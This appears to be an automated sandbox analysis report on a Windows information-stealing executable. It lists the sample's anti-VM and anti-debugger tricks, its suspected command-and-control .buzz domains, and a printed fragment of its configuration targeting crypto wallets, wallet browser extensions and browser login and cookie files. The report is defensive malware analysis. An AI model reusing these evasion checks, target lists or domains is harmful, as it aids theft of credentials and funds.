                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E400C1 second address: 4E400C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E400C5 second address: 4E400D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E400D5 second address: 4E400D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E400D9 second address: 4E400DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E400DD second address: 4E400E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40127 second address: 4E4012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E4012B second address: 4E40148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3331238829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40BC8 second address: 4E40BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40BCE second address: 4E40BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40BD4 second address: 4E40BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40BD8 second address: 4E40C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333123881Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F333123881Bh 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F3331238826h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov si, 1B1Dh 0x0000001e call 00007F333123881Ah 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40D45 second address: 4E40D54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSpecial instruction interceptor: First address: 5089C8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSpecial instruction interceptor: First address: 508AB5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSpecial instruction interceptor: First address: 6B0366 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSpecial instruction interceptor: First address: 6D7B22 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSpecial instruction interceptor: First address: 6C04F8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSpecial instruction interceptor: First address: 740D4B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00508954 rdtsc 0_2_00508954
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exe TID: 3108Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exe TID: 3108Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: Wvo9FU4qo9.exe, Wvo9FU4qo9.exe, 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: Wvo9FU4qo9.exe, Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671306790.0000000000F29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547346485.0000000005863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW=
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1547499986.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeAPI call chain: ExitProcess graph end nodegraph_0-15284
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: SICE
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00508954 rdtsc 0_2_00508954
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004EE110 LdrInitializeThunk,0_2_004EE110

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Wvo9FU4qo9.exeString found in binary or memory: hummskitnj.buzz
                Source: Wvo9FU4qo9.exeString found in binary or memory: cashfuzysao.buzz
                Source: Wvo9FU4qo9.exeString found in binary or memory: appliacnesot.buzz
                Source: Wvo9FU4qo9.exeString found in binary or memory: screwamusresz.buzz
                Source: Wvo9FU4qo9.exeString found in binary or memory: inherineau.buzz
                Source: Wvo9FU4qo9.exeString found in binary or memory: scentniej.buzz
                Source: Wvo9FU4qo9.exeString found in binary or memory: rebuildeso.buzz
                Source: Wvo9FU4qo9.exeString found in binary or memory: prisonyfork.buzz
                Source: Wvo9FU4qo9.exeString found in binary or memory: mindhandru.buzz
                Source: Wvo9FU4qo9.exe, Wvo9FU4qo9.exe, 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: -Program Manager
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1673430816.000000000583D000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000002.1671306790.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1626808500.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1641117823.000000000583D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Wvo9FU4qo9.exe PID: 6596, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671658667.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671658667.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671658667.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"ez":"Coinbase","ldb":true},{"en":"hpglfhgfnhbgpjdenjgmdgoeiappafln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojp
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671658667.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671658667.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671658667.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "},{"en":"lpfcbjknijpeeillifnkikgncikgfhdo","ez":"Nami"},{"en":"ejjladinnckdgjemekebdpeokbikhfci","ez":"Petra"},{"en":"opcgpfmipidbgpenhmajoajpbobppdil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"}X
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671658667.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1602681941.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671658667.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
